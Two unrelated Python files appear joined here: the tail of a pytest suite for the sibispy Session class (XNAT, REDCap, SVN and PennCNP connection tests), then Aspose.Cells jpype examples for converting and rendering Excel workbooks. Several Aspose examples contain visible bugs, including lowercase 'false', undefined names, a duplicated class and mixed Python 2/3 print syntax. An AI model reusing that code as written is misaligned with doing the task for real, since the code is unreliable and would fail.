assert parser != None, "Config Parser for test should not be None."
category = parser.get_category('test_session')
assert category, "`test_session` category should exist."
cfg = category['test_config_parser']
assert cfg != None, "Test config should exist."
assert cfg['alpha'] == 12345678, "Values should match"
assert cfg['bravo'] == 'http://example.com'
assert cfg['charlie'] == [ 'uno', 'dos', 'tres', 'cuarto', 'cinco' ]
assert cfg['denver']['California'] == 'Sacramento'
assert cfg['denver']['Colorado'] == 'Denver'
assert cfg['denver']['Texas'] == 'Austin'
def test_config_sys_parser(session):
(sys_file_parser,err_msg) = session.get_config_sys_parser()
assert not err_msg, "Error: session.get_config_sys_parser:" + err_msg
assert sys_file_parser, "Error: `sys_file_parser` should not be None"
session_data = sys_file_parser.get_category('session')
assert session_data, "`session_data` should not be None"
@pytest.mark.parametrize('api_type', [
'svn_laptop'
])
def test_connect_server(session, api_type):
connection = session.connect_server(api_type)
assert connection != None, "Expected to have a connection"
def test_session_xnat_export_general(session, slog):
project = 'xnat'
server = session.connect_server(project, True)
xnat_sessions_fields = ['xnat:mrSessionData/SESSION_ID','xnat:mrSessionData/SUBJECT_ID','xnat:mrSessionData/PROJECTS','xnat:mrSessionData/DATE','xnat:mrSessionData/SCANNER']
xnat_sessions_list = session.xnat_export_general( 'xnat:mrSessionData', xnat_sessions_fields, [ ('xnat:mrSessionData/SESSION_ID','LIKE', '%') ],"subject_session_data")
assert xnat_sessions_list != None
xnat_sessions_dict = dict()
for ( session_id, session_subject_id, projects, date, scanner ) in xnat_sessions_list:
xnat_sessions_dict[session_id] = ( date, scanner, projects )
def test_session_api_svn_laptop(session, config):
laptop_cfg = config['svn_laptop']
if laptop_cfg == None:
warnings.warn(UserWarning("Expected config file to have `svn_laptop` config"))
pytest.skip("Skipping test, `svn_laptop` config missing.")
connected_client = session.connect_server('svn_laptop')
client_info = session.api['svn_laptop']
assert client_info != None, "Expected client_info to not be None"
user = client_info['user']
assert user == laptop_cfg['user'] and user != None, "Expected user to be {} and not be None. got: {} ".format(laptop_cfg['user'], user)
password = client_info['password']
assert password == laptop_cfg['password'] and password != None, "Expected password to be {} and not be None. got: {} ".format(laptop_cfg['password'], password)
client = client_info['client']
assert client != None, "Expected client to not be None"
assert connected_client == client, "Clients should be the same object"
def test_session_connect_server_info(session):
connected_client = session.connect_server('svn_laptop')
svn_info = connected_client.info()
assert svn_info != None, "Response sholuld not be None"
assert svn_info['wcinfo_wcroot_abspath'] == session.get_laptop_svn_dir(), "SVN Working directories should match."
def test_session_xnat_non_empty_query(slog, config_file, session):
project = 'xnat'
server = session.connect_server(project, True)
assert server, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
# 1. XNAT Test: Non-Empty querry
with sess.Capturing() as xnat_output:
searchResult = session.xnat_export_general( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'], [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')],"subject_list")
if '"err_msg": "Apache Tomcat' in xnat_output.__str__():
warnings.warn(UserWarning("Info: username or password might be incorrect - check crudentials by using them to manually log in XNAT! "))
assert xnat_output.__str__() == '[]', "Error: session.xnat_export_general: failed to perform querry. Got: {}".format(xnat_output.__str__())
assert searchResult != None, "Error: session.xnat_export_general: Test returned empty record"
def test_session_xnat_get_experiment(slog, config_file, session, config_test_data):
project = 'xnat'
server = session.connect_server(project, True)
assert server, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
#
# xnat_get_experiment
#
eid = r"DOES-NOT-EXIST"
with sess.Capturing() as xnat_output:
exp = session.xnat_get_experiment(eid)
assert None == exp, "Error: session.xnat_get_experiment: " + eid + " should not exist!"
if "xnat_uri_test" in list(config_test_data):
[project,subject,eid] = config_test_data["xnat_uri_test"].split(',')
experiment = session.xnat_get_experiment(eid)
assert None != experiment, "Error: session.xnat_get_experiment: " + eid + " should exist!"
# Difference in the call - which one you use will decide where data is stored on hard drive !
print("URI direct:", experiment.resources['nifti'].uri)
experiment = session.xnat_get_experiment(eid,project = project,subject_label = subject)
assert None != experiment, "Error: session.xnat_get_experiment: {} should exist in project {} and subject {} !".format(eid, project, subject)
print("URI with subject:", experiment.resources['nifti'].uri)
# zip_path="/tmp/tmpQcABtX/1_ncanda-localizer-v1.zip"
#file_path= exp.resource('nifti')._uri
#if not os.path.exists(file_path) :
# print "Error: xnat configuration wrong !" + file_path + " does not exist !"
# server.select.project(project).subject(subject).experiment(eid).resource('nifti').put_zip(zip_path, overwrite=True,extract=True)
else :
warnings.warn(RuntimeWarning("Warning: Skipping XNAT uri test as it is not defined"))
def test_session_xnat_stress_test(slog, config_file, session, config_test_data):
project = 'xnat'
client = session.connect_server(project, True)
#
# Stress Test:
#
if "xnat_stress_test" in list(config_test_data) :
[xnat_eid, resource_id, resource_file_bname] = config_test_data["xnat_stress_test"].split('/')
tmpdir = tempfile.mkdtemp()
print("Start XNAT stress test ...")
slog.startTimer2()
# If fails, MIKE solution
target_file = os.path.join(tmpdir, "blub.tar.gz")
client.download_file(xnat_eid, resource_id, resource_file_bname, target_file)
assert os.path.exists(target_file) and os.path.isfile(target_file), "Expected file `{}` to download.".format(target_file)
slog.takeTimer2("XNATStressTest","XNAT Stress Test")
print("... completed")
shutil.rmtree(tmpdir)
else :
warnings.warn(RuntimeWarning("Warning: Skipping XNAT stress test as it is not defined"))
def test_session_xnat_failed_query(slog, config_file, session, config_test_data):
project = 'xnat'
server = session.connect_server(project, True)
test_data = config_test_data['xnat_subject_attribute_test']
# 3. XNAT Test: Failed querry
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute('blub','blub','blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: session.xnat_get_subject_attribute: subject" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'],'blub','blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: session.xnat_get_subject_attribute: subject" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'],'blub')
assert response[0] == None, "Expected no attribute, got {}".format(response[0])
assert response[1] != None, "Expected Error, got None!"
if "ERROR: attribute could not be found" not in xnat_output.__str__():
print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
print(xnat_output.__str__())
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'], 'label')
assert response[1] == None, "Expected there to be no errors. Got: {}".format(response[1])
assert response[0] != None, "Expected response, got Nothing."
response = (1, None)
with sess.CapturingTee() as xnat_output:
response = session.xnat_get_subject_attribute(test_data['project'], test_data['subject'], 'ID')
assert response[1] == None, "Expected there to be no errors. Got: {}".format(response[1])
assert response[0] != None, "Expected response, got Nothing."
def test_session_xnat_search(slog, config_file, session, config_test_data):
client = session.connect_server('xnat', True)
subject_project_list = list(client.search( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'] ).where( [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')] ).items())
assert subject_project_list != None, "Search result should not be None."
@pytest.fixture
def penncnp_cleanup(session):
yield
session.disconnect_penncnp()
def test_session_browser_penncnp(slog, config_file, session, config_test_data, penncnp_cleanup):
project = 'browser_penncnp'
# import pdb; pdb.set_trace()
server = session.connect_server(project, True)
assert server != None, "Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file
wait = session.initialize_penncnp_wait()
assert session.get_penncnp_export_report(wait)
def test_session_legacy(config_file, special_opts):
import os
import glob
import pandas as pd
import sys
import sibispy
import traceback
from sibispy import sibislogger as slog
from sibispy import config_file_parser as cfg_parser
import tempfile
import shutil
#
# MAIN
#
# if sys.argv.__len__() > 1 :
# config_file = sys.argv[1]
# else :
# config_file = os.path.join(os.path.dirname(sys.argv[0]), 'data', '.sibis-general-config.yml')
if special_opts == 'default_general_config':
config_file = os.path.join(os.path.dirname(sys.argv[0]), 'data', '.sibis-general-config.yml')
timeLogFile = '/tmp/test_session-time_log.csv'
if os.path.isfile(timeLogFile) :
os.remove(timeLogFile)
slog.init_log(False, False,'test_session', 'test_session','/tmp')
session = sess.Session()
assert session.configure(config_file), "Configuration File `{}` is missing or not readable.".format(config_file)
errors = False
# Check that the file infrastructure is setup correctly
for DIR in [session.get_log_dir(), session.get_operations_dir(), session.get_cases_dir(), session.get_summaries_dir(), session.get_dvd_dir(), session.get_datadict_dir()] :
if not os.path.exists(DIR) :
print("ERROR: " + DIR + " does not exist!")
errors = True
for DIR in [ session.get_laptop_imported_dir(), session.get_laptop_svn_dir(), session.get_xnat_dir(), session.get_redcap_uploads_dir()] :
if not os.path.exists(DIR) :
print("ERROR: " + DIR + " does not exist! Ignore if this is back end")
errors = True
# Make sure directories are assigned to the correct user
user_id = os.getuid()
for DIR in [ session.get_laptop_imported_dir(), session.get_laptop_svn_dir() ]:
path_uid = os.stat(DIR).st_uid
if user_id != path_uid :
print("ERROR: Dir '" + DIR + "' owned by user with id", path_uid," and not user running the script (id: " + str(user_id) + ")")
errors = True
for DIR in glob.glob(os.path.join(session.get_log_dir(),"*")):
path_uid = os.stat(DIR).st_uid
if user_id != path_uid :
print("ERROR: Dir '" + DIR + "' owned by user with id", path_uid," and not user running the script (id: " + str(user_id) + ")")
errors = True
bDir = session.get_beta_dir()
if os.path.exists(bDir):
perm = os.stat(bDir).st_mode & 0o777
if perm != 0o777 :
print("ERROR: Permission of " + bDir + " have to be 777 !")
errors = True
else :
print("ERROR: " + bDir + " does not exist!")
errors = True
# Load in test specific settings :
(sys_file_parser,err_msg) = session.get_config_test_parser()
if err_msg :
print("Error: session.get_config_test_parser:" + err_msg)
errors = True
if errors:
assert not errors, "Errors occured, see output."
config_test_data = sys_file_parser.get_category('test_session')
if not config_test_data :
warnings.warn(UserWarning("Warning: test_session specific settings not defined!"))
config_test_data = dict()
# Check that the servers are accessible
with sess.Capturing() as xnat_output:
assert (session.xnat_get_subject_attribute('blub','blub','blub')[0] == None)
assert "Error: XNAT api not defined" in xnat_output.__str__(), "Error: session.xnat_get_subject_attribute: Test did not return correct error message\n"+xnat_output.__str__()
for project in ['xnat','xnat_http', 'svn_laptop', 'data_entry','browser_penncnp', 'import_laptops', 'redcap_mysql_db'] :
print("==== Testing " + project + " ====")
try :
server = session.connect_server(project, True)
if not server:
print("Error: could not connect server! Make sure " + project + " is correctly defined in " + config_file)
errors = True
continue
if project == 'xnat_http':
experiments = session.xnat_http_get_all_experiments()
if not experiments or experiments.text.count('\n') < 2:
print("Error: session.xnat_http_get_all_experiments: failed to perform querry")
errors = True
continue
experiment_id=experiments.text.splitlines()[1].split(',')[0].replace("\"", "")
exp_html=session.xnat_http_get_experiment_xml(experiment_id).text
if not [x for x in exp_html.splitlines() if "xnat:MRSession" in x] :
print("Error: session.xnat_http_get_experiment_xml: failed to perform querry")
errors = True
continue
if project == 'xnat':
print("XNAT Tests moved to different test methods")
# # 1. XNAT Test: Non-Empty querry
# with sess.Capturing() as xnat_output:
# searchResult = session.xnat_export_general( 'xnat:subjectData', ['xnat:subjectData/SUBJECT_LABEL', 'xnat:subjectData/SUBJECT_ID','xnat:subjectData/PROJECT'], [ ('xnat:subjectData/SUBJECT_LABEL','LIKE', '%')],"subject_list")
# if xnat_output.__str__() != '[]' :
# errors = True
# print("Error: session.xnat_export_general: failed to perform querry")
# if '"err_msg": "Apache Tomcat' in xnat_output.__str__():
# warnings.warn(UserWarning("Info: username or password might be incorrect - check crudentials by using them to manually log in XNAT! "))
# print(xnat_output.__str__())
# elif searchResult == None :
# print("Error: session.xnat_export_general: Test returned empty record")
# errors = True
# #
# # xnat_get_experiment
# #
# eid = "DOES-NOT-EXIST"
# with sess.Capturing() as xnat_output:
# exp = session.xnat_get_experiment(eid)
# if exp :
# print("Error: session.xnat_get_experiment: " + eid + " should not exist!")
# errors = True
# if "xnat_uri_test" in list(config_test_data):
# [project,subject,eid] = config_test_data["xnat_uri_test"].split(',')
# experiment = session.xnat_get_experiment(eid)
# if not experiment :
# print("Error: session.xnat_get_experiment: " + eid + " should exist!")
# errors = True
# else :
# # Difference in the call - which one you use will decide where data is stored on hard drive !
# print("URI direct:", experiment.resource('nifti')._uri)
# experiment = session.xnat_get_experiment(eid,project = project,subject_label = subject)
# if not experiment :
# print("Error: session.xnat_get_experiment: " + eid + " should exist in project", project, "and subject ", subject_label, "!")
# errors = True
# else :
# print("URI with subject:", experiment.resource('nifti')._uri)
# # zip_path="/tmp/tmpQcABtX/1_ncanda-localizer-v1.zip"
# #file_path= exp.resource('nifti')._uri
# #if not os.path.exists(file_path) :
# # print "Error: xnat configuration wrong !" + file_path + " does not exist !"
# # server.select.project(project).subject(subject).experiment(eid).resource('nifti').put_zip(zip_path, overwrite=True,extract=True)
# else :
# warnings.warn(RuntimeWarning("Warning: Skipping XNAT uri test as it is not defined"))
# #
# # Stress Test:
# #
# if "xnat_stress_test" in list(config_test_data) :
# [xnat_eid, resource_id, resource_file_bname] = config_test_data["xnat_stress_test"].split('/')
# tmpdir = tempfile.mkdtemp()
# print("Start XNAT stress test ...")
# slog.startTimer2()
# # If fails, MIKE solution
# server.select.experiment(xnat_eid).resource(resource_id).file(resource_file_bname).get_copy(os.path.join(tmpdir, "blub.tar.gz"))
# slog.takeTimer2("XNATStressTest","XNAT Stress Test")
# print("... completed")
# shutil.rmtree(tmpdir)
# else :
# warnings.warn(RuntimeWarning("Warning: Skipping XNAT stress test as it is not defined"))
# # 3. XNAT Test: Failed querry
# with sess.Capturing() as xnat_output:
# assert session.xnat_get_subject_attribute('blub','blub','blub')[0] == None
# if "ERROR: attribute could not be found" not in xnat_output.__str__():
# print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
# print(xnat_output.__str__())
# errors = True
# # no xnat tests after this one as it breaks the interface for some reason
server = None
elif project == 'svn_laptop' :
print("== Only works for frontend right now ! ==")
svn_client = session.svn_client()
assert svn_client, "Client should not be None"
svn_info = svn_client.info()
assert svn_info, "Info should not be None"
# To speed up test
lapDir = session.get_laptop_svn_dir()
svn_dir = [ name for name in os.listdir(lapDir) if name != ".svn" and os.path.isdir(os.path.join(lapDir, name)) ][0]
# and now test
assert svn_client.log(rel_filepath = svn_dir)
elif project == 'browser_penncnp' :
print("browser_penncnp Tests moved to different test methods")
# wait = session.initialize_penncnp_wait()
# assert session.get_penncnp_export_report(wait)
elif project == 'import_laptops' :
if "redcap_version_test" in list(config_test_data) :
(form_prefix, name_of_form) = config_test_data["redcap_version_test"].split(',')
complete_label = '%s_complete' % name_of_form
exclude_label = '%s_exclude' % form_prefix
# If test fails Mike with message that redord_id is missing than it uses wrong redcap lib - use egg version
import_complete_records = server.export_records( fields = [complete_label, exclude_label], format='df' )
else :
warnings.warn(RuntimeWarning("Warning: Skipping REDCap version test as it is not defined"))
elif project == 'data_entry' :
print("Testing REDCap Version:", session.get_redcap_version())
form_event_mapping = server.export_fem( format='df' )
assert not form_event_mapping.empty
# Note: the name of form_name is version-independent in mysql tables - see for example server.metadata
assert session.get_redcap_form_key() in form_event_mapping
assert len(server.export_records(fields=['study_id'],event_name='unique',format='df'))
if "redcap_stress_test" in list(config_test_data):
all_forms = config_test_data["redcap_stress_test"]
form_prefixes = list(all_forms.keys())
names_of_forms = list(all_forms.values())
entry_data_fields = [('%s_complete' % form) for form in names_of_forms] + [('%s_missing' % form) for form in form_prefixes] + [('%s_record_id' % form) for form in form_prefixes]
entry_data_fields += ['study_id', 'dob', 'redcap_event_name', 'visit_date', 'exclude', 'sleep_date']
entry_data_fields += ['parentreport_manual']
print("Start REDCap stress test ...")
slog.startTimer2()
# If tests fails, Mike
session.redcap_export_records("RCStressTest",fields=entry_data_fields,event_name='unique',format='df')
slog.takeTimer2("RCStressTest","REDCap Stress Test")
print(".... completed")
else :
warnings.warn(RuntimeWarning("Warning: Skipping REDCap stress test as it is not defined"))
elif project == 'redcap_mysql_db' :
pd.read_sql_table('redcap_projects', server)
# more detailed testing in test_redcap_locking_data
except AssertionError as ae:
_, _, tb = sys.exc_info()
# traceback.print_tb(tb) # Fixed format
tb_info = traceback.extract_tb(tb)
filename, line, func, text = tb_info[-1]
print("Error: Assertion: occurred on line {} in statement '{}'".format(line, text))
errors = True
except Exception as err_msg:
print("Error: Failed to retrieve content from " + project + ". Server responded :")
print(str(err_msg))
errors = True
# if project == 'browser_penncnp' :
# session.disconnect_penncnp()
assert not errors, "Errors occurred, see previous output."
print("Info: Time log writen to " + timeLogFile)
|
|
__author__ = 'fahadadeel'
import jpype
class ChartToImage:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ChartType = jpype.JClass("com.aspose.cells.ChartType")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.FileOutputStream = jpype.JClass("java.io.FileOutputStream")
self.Color = jpype.JClass("java.awt.Color")
def main(self):
chartType = self.ChartType
color = self.Color
imageFormat = self.ImageFormat
#Create a Workbook+
workbook = self.Workbook()
#Get the first worksheet+
sheet = workbook.getWorksheets().get(0)
#Set the name of worksheet
sheet.setName("Data")
#Get the cells collection in the sheet+
cells = workbook.getWorksheets().get(0).getCells()
#Put some values into a cells of the Data sheet+
cells.get("A1").setValue("Region")
cells.get("A2").setValue("France")
cells.get("A3").setValue("Germany")
cells.get("A4").setValue("England")
cells.get("A5").setValue("Sweden")
cells.get("A6").setValue("Italy")
cells.get("A7").setValue("Spain")
cells.get("A8").setValue("Portugal")
cells.get("B1").setValue("Sale")
cells.get("B2").setValue(70000)
cells.get("B3").setValue(55000)
cells.get("B4").setValue(30000)
cells.get("B5").setValue(40000)
cells.get("B6").setValue(35000)
cells.get("B7").setValue(32000)
cells.get("B8").setValue(10000)
#Create chart
chartIndex = sheet.getCharts().add(chartType.COLUMN, 12, 1, 33, 12)
chart = sheet.getCharts().get(chartIndex)
#Set properties of chart title
chart.getTitle().setText("Sales By Region")
chart.getTitle().getFont().setBold(True)
chart.getTitle().getFont().setSize(12)
#Set properties of nseries
chart.getNSeries().add("Data!B2:B8", True)
chart.getNSeries().setCategoryData("Data!A2:A8")
#Set the fill colors for the series's data points (France - Portugal(7 points))
chartPoints = chart.getNSeries().get(0).getPoints()
point = chartPoints.get(0)
#print(self.Color.getWhite())
point.getArea().setForegroundColor(self.Color.white())
point = chartPoints.get(1)
point.getArea().setForegroundColor(self.Color.getBlue())
point = chartPoints.get(2)
point.getArea().setForegroundColor(self.Color.getYellow())
point = chartPoints.get(3)
point.getArea().setForegroundColor(self.Color.getRed())
point = chartPoints.get(4)
point.getArea().setForegroundColor(self.Color.getBlack())
point = chartPoints.get(5)
point.getArea().setForegroundColor(self.Color.getGreen())
point = chartPoints.get(6)
point.getArea().setForegroundColor(self.Color.getMaroon())
#Set the legend invisible
chart.setShowLegend(false)
#Get the Chart image
imgOpts = self.ImageOrPrintOptions()
imgOpts.setImageFormat(imageFormat.getEmf())
fs = FileOutputStream(dataDir + "Chart.emf")
#Save the chart image file+
chart.toImage(fs, imgOpts)
fs.close()
# Print message
print("<BR>")
print("Processing performed successfully")
class ConvertingExcelFilesToHtml:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Save the document in PDF format
workbook.save(self.dataDir + "OutBook1.html", saveFormat.HTML)
# Print message
print "\n Excel to HTML conversion performed successfully."
class ConvertingToMhtmlFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.HtmlSaveOptions = jpype.JClass("com.aspose.cells.HtmlSaveOptions")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
#Specify the file path
filePath = self.dataDir + "Book1.xlsx"
#Specify the HTML saving options
sv = self.HtmlSaveOptions(saveFormat.M_HTML)
#Instantiate a workbook and open the template XLSX file
wb = self.Workbook(filePath)
#Save the MHT file
wb.save(filePath + ".out.mht", sv)
# Print message
print "Excel to MHTML conversion performed successfully."
class ConvertingToXPS:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Get the first worksheet.
sheet = workbook.getWorksheets().get(0)
#Apply different Image and Print options
options = self.ImageOrPrintOptions()
#Set the Format
options.setSaveFormat(saveFormat.XPS)
# Render the sheet with respect to specified printing options
sr = self.SheetRender(sheet, options)
sr.toImage(0, self.dataDir + "out_printingxps.xps")
#Save the complete Workbook in XPS format
workbook.save(self.dataDir + "out_whole_printingxps", saveFormat.XPS)
# Print message
print "Excel to XPS conversion performed successfully."
class ConvertingWorksheetToSVG:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Convert each worksheet into svg format in a single page.
imgOptions = ImageOrPrintOptions()
imgOptions.setSaveFormat(saveFormat.SVG)
imgOptions.setOnePagePerSheet(True)
#Convert each worksheet into svg format
sheetCount = workbook.getWorksheets().getCount()
#for(i=0; i<sheetCount; i++)
for i in range(sheetCount):
sheet = workbook.getWorksheets().get(i)
sr = SheetRender(sheet, imgOptions)
pageCount = sr.getPageCount()
#for (k = 0 k < pageCount k++)
for k in range(pageCount):
#Output the worksheet into Svg image format
sr.toImage(k, self.dataDir + sheet.getName() + ".out.svg")
# Print message
print "Excel to SVG conversion completed successfully."
class ConvertingWorksheetToSVG:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Convert each worksheet into svg format in a single page.
imgOptions = self.ImageOrPrintOptions()
imgOptions.setSaveFormat(saveFormat.SVG)
imgOptions.setOnePagePerSheet(True)
#Convert each worksheet into svg format
sheetCount = workbook.getWorksheets().getCount()
#for(i=0; i<sheetCount; i++)
for i in range(sheetCount):
sheet = workbook.getWorksheets().get(i)
sr = self.SheetRender(sheet, imgOptions)
pageCount = sr.getPageCount()
#for (k = 0 k < pageCount k++)
for k in range(pageCount):
#Output the worksheet into Svg image format
sr.toImage(k, self.dataDir + sheet.getName() + ".out.svg")
# Print message
print "Excel to SVG conversion completed successfully."
class Excel2PdfConversion:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Save the document in PDF format
workbook.save(self.dataDir + "OutBook1.pdf", saveFormat.PDF)
# Print message
print "\n Excel to PDF conversion performed successfully."
class ManagingDocumentProperties:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Retrieve a list of all custom document properties of the Excel file
customProperties = workbook.getWorksheets().getCustomDocumentProperties()
#Accessing a custom document property by using the property index
#customProperty1 = customProperties.get(3)
#Accessing a custom document property by using the property name
customProperty2 = customProperties.get("Owner")
#Adding a custom document property to the Excel file
publisher = customProperties.add("Publisher", "Aspose")
#Save the file
workbook.save(self.dataDir + "Test_Workbook.xls")
#Removing a custom document property
customProperties.remove("Publisher")
#Save the file
workbook.save(self.dataDir + "Test_Workbook_RemovedProperty.xls")
# Print message
print "Excel file's custom properties accessed successfully."
class OpeningFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.FileFormatType = jpype.JClass("com.aspose.cells.FileFormatType")
self.LoadOptions = jpype.JClass("com.aspose.cells.LoadOptions")
self.FileInputStream = jpype.JClass("java.io.FileInputStream")
def main(self):
fileFormatType = self.FileFormatType
# 1. Opening from path
# Creatin an Workbook object with an Excel file path
workbook1 = self.Workbook(self.dataDir + "Book1.xls")
print "Workbook opened using path successfully.";
# 2 Opening workbook from stream
#Create a Stream object
fstream = self.FileInputStream(self.dataDir + "Book2.xls")
#Creating an Workbook object with the stream object
workbook2 = self.Workbook(fstream)
fstream.close()
print ("Workbook opened using stream successfully.");
# 3.
# Opening Microsoft Excel 97 Files
#Createing and EXCEL_97_TO_2003 LoadOptions object
loadOptions1 = self.LoadOptions(fileFormatType.EXCEL_97_TO_2003)
#Creating an Workbook object with excel 97 file path and the loadOptions object
workbook3 = self.Workbook(self.dataDir + "Book_Excel97_2003.xls", loadOptions1)
# Print message
print("Excel 97 Workbook opened successfully.");
# 4.
# Opening Microsoft Excel 2007 XLSX Files
#Createing and XLSX LoadOptions object
loadOptions2 = self.LoadOptions(fileFormatType.XLSX)
#Creating an Workbook object with 2007 xlsx file path and the loadOptions object
workbook4 = self.Workbook(self.dataDir + "Book_Excel2007.xlsx", loadOptions2)
# Print message
print ("Excel 2007 Workbook opened successfully.")
# 5.
# Opening SpreadsheetML Files
#Creating and EXCEL_2003_XML LoadOptions object
loadOptions3 = self.LoadOptions(fileFormatType.EXCEL_2003_XML)
#Creating an Workbook object with SpreadsheetML file path and the loadOptions object
workbook5 = self.Workbook(self.dataDir + "Book3.xml", loadOptions3)
# Print message
print ("SpreadSheetML format workbook has been opened successfully.");
# 6.
# Opening CSV Files
#Creating and CSV LoadOptions object
loadOptions4 = self.LoadOptions(fileFormatType.CSV)
#Creating an Workbook object with CSV file path and the loadOptions object
workbook6 = self.Workbook(self.dataDir + "Book_CSV.csv", loadOptions4)
# Print message
print ("CSV format workbook has been opened successfully.")
# 7.
# Opening Tab Delimited Files
# Creating and TAB_DELIMITED LoadOptions object
loadOptions5 = self.LoadOptions(fileFormatType.TAB_DELIMITED);
# Creating an Workbook object with Tab Delimited text file path and the loadOptions object
workbook7 = self.Workbook(self.dataDir + "Book1TabDelimited.txt", loadOptions5)
# Print message
print("<br />");
print ("Tab Delimited workbook has been opened successfully.");
# 8.
# Opening Encrypted Excel Files
# Creating and EXCEL_97_TO_2003 LoadOptions object
loadOptions6 = self.LoadOptions(fileFormatType.EXCEL_97_TO_2003)
# Setting the password for the encrypted Excel file
loadOptions6.setPassword("1234")
# Creating an Workbook object with file path and the loadOptions object
workbook8 = self.Workbook(self.dataDir + "encryptedBook.xls", loadOptions6)
# Print message
print("<br />");
print ("Encrypted workbook has been opened successfully.");
class SavingFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.FileFormatType = jpype.JClass("com.aspose.cells.FileFormatType")
def main(self):
fileFormatType = self.FileFormatType
#Creating an Workbook object with an Excel file path
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Save in default (Excel2003) format
workbook.save(self.dataDir + "book.default.out.xls")
#Save in Excel2003 format
workbook.save(self.dataDir + "book.out.xls", fileFormatType.EXCEL_97_TO_2003)
#Save in Excel2007 xlsx format
workbook.save(self.dataDir + "book.out.xlsx", fileFormatType.XLSX)
#Save in SpreadsheetML format
workbook.save(self.dataDir + "book.out.xml", fileFormatType.EXCEL_2003_XML)
#Print Message
print("<BR>")
print("Worksheets are saved successfully.")
class WorksheetToImage:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
def main(self):
imageFormat = self.ImageFormat
#Instantiate a workbook with path to an Excel file
book = self.Workbook(self.dataDir + "Book1.xls")
#Create an object for ImageOptions
imgOptions = self.ImageOrPrintOptions()
#Set the image type
imgOptions.setImageFormat(imageFormat.getPng())
#Get the first worksheet.
sheet = book.getWorksheets().get(0)
#Create a SheetRender object for the target sheet
sr =self.SheetRender(sheet, imgOptions)
for i in range(sr.getPageCount()):
#Generate an image for the worksheet
sr.toImage(i, self.dataDir + "mysheetimg" + ".png")
# Print message
